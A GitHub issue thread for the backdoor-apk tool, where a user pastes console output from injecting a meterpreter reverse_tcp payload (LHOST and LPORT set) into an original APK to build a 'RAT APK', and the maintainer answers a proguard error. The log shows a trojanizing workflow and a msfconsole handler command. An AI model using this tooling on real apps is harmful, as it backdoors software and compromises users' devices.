### ISSUE TITLE
Failed to run proguard with specified configuration

### ISSUE THREAD

**Issue by dumbevil** [dana-at-cp/backdoor-apk#145]
I am getting this error, please help. 

[*] Running backdoor-apk.sh v0.2.3 on Tue Jul 24 05:38:13 PDT 2018
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.0.108
[?] Please enter an LPORT value: 5555
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 1
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling original APK file...done.
[+] Keeping permissions of original project
[*] Running proguard on RAT APK file...done.
[!] Failed to run proguard with specified configuration

**Comment by dana-at-cp** [comment]
@dumbevil Proguard is going away in the next release.
